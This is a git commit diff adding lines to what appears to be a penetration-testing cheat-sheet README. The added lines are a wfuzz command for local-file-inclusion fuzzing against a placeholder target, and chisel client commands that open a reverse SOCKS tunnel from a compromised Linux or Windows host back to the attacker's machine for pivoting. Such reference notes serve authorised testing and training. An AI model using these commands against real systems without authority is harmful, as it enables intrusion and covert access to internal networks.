Update README.md
This commit is contained in:
@@ -333,6 +333,10 @@ directory-list-2.3-medium.txt
|
|||||||
directory-list-lowercase-2.3-medium.txt
|
directory-list-lowercase-2.3-medium.txt
|
||||||
```
|
```
|
||||||
|
|
||||||
|
#LFI FUZZ
|
||||||
|
wfuzz -c -z file,LFI_FUZZ.txt "http://{RHOST}/browse.php?p=source&file=FUZZ"
|
||||||
|
|
||||||
|
|
||||||
<br />
|
<br />
|
||||||
|
|
||||||
|
|
||||||
@@ -1491,8 +1495,12 @@ chisel server -p 3477 --socks5 --reverse
|
|||||||
|
|
||||||
# RHOST (Windows) - Transfer chisel.exe
|
# RHOST (Windows) - Transfer chisel.exe
|
||||||
chisel64.exe client {LHOST}:3477 R:socks
|
chisel64.exe client {LHOST}:3477 R:socks
|
||||||
|
|
||||||
PS> .\chisel64.exe client {LHOST}:3477 R:socks
|
PS> .\chisel64.exe client {LHOST}:3477 R:socks
|
||||||
|
|
||||||
|
# RHOST (Linux) - Transfer chisel_lin64
|
||||||
|
./chisel_lin64 client {LHOST}:3477 R:socks
|
||||||
|
|
||||||
# LHOST
|
# LHOST
|
||||||
sudo NMAP -sT -Pn -n {FIREWALLED RHOST}
|
sudo NMAP -sT -Pn -n {FIREWALLED RHOST}
|
||||||
|
|
||||||
|
|||||||
Reference in New Issue
Block a user